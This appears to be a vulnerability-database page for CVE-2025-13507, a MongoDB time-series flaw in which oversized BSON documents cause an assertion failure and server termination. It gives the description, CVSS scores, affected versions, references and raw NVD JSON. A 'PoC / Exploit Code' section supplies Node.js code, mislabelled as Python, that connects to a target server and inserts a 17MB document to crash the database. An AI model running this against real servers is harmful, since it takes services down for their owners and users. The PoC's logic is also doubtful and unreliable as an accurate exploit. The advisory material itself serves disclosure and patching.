CVE-2025-13507

Description

Inconsistent object size validation in time series processing logic may result in later processing of oversized BSON documents leading to an assert failing and process termination. This issue impacts MongoDB Server v7.0 versions prior to 7.0.26, v8.0 versions prior to 8.0.16 and MongoDB server v8.2 versions prior to 8.2.1.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:* - VULNERABLE

MongoDB Server v7.0 < 7.0.26

MongoDB Server v8.0 < 8.0.16

MongoDB Server v8.2 < 8.2.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-13507 PoC - MongoDB Time Series Oversized BSON Document DoS
// This PoC demonstrates how oversized BSON documents in time series collections
// can trigger assertion failure and process termination.

const { MongoClient } = require('mongodb');

async function exploitCVE202513507() {
    const mongoUrl = 'mongodb://target:27017';
    const client = new MongoClient(mongoUrl);
    
    try {
        await client.connect();
        const db = client.db('test');
        
        // Create time series collection
        await db.createCollection('sensors', {
            timeseries: {
                timeField: 'timestamp',
                metaField: 'metadata',
                granularity: 'seconds'
            }
        });
        
        // Create oversized BSON document (>16MB limit or crafted to bypass validation)
        // The vulnerability allows documents that should be rejected to proceed
        const oversizedData = 'A'.repeat(17 * 1024 * 1024); // 17MB of data
        
        const maliciousDoc = {
            timestamp: new Date(),
            metadata: { sensorId: 'sensor001' },
            data: oversizedData
        };
        
        // Insert oversized document - triggers assertion failure
        const collection = db.collection('sensors');
        await collection.insertOne(maliciousDoc);
        
        console.log('PoC executed - oversized document inserted');
        console.log('MongoDB process should terminate with assertion failure');
        
    } catch (error) {
        if (error.message.includes('assertion')) {
            console.log('CVE-2025-13507 exploited: Assertion failure detected');
        }
        console.error('Error:', error.message);
    } finally {
        await client.close();
    }
}

exploitCVE202513507();

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13507
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13507
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13507/
[4] VulDB https://vuldb.com/cve/CVE-2025-13507
[5] https://jira.mongodb.org/browse/SERVER-108565

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13507", "sourceIdentifier": "[email protected]", "published": "2025-11-25T05:16:09.090", "lastModified": "2025-12-05T20:23:31.947", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inconsistent object size validation in time series processing logic may result in later processing of oversized BSON documents leading to an assert failing and process termination. \nThis issue impacts MongoDB Server v7.0 versions prior to 7.0.26, v8.0 versions prior to 8.0.16 and MongoDB server v8.2 versions prior to 8.2.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.26", "matchCriteriaId": "8788DEE3-96FD-4F62-BE22-EB3F9C4DD73F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.16", "matchCriteriaId": "4FDD391D-C3DB-4B1D-84F7-A0D3283C623D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "8.2.0", "versionEndExcluding": "8.2.1", "matchCriteriaId": "ED96FAD0-8C69-4554-A7A1-D8DE7434F6BD"}]}]}], "references": [{"url": "https://jira.mongodb.org/browse/SERVER-108565", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}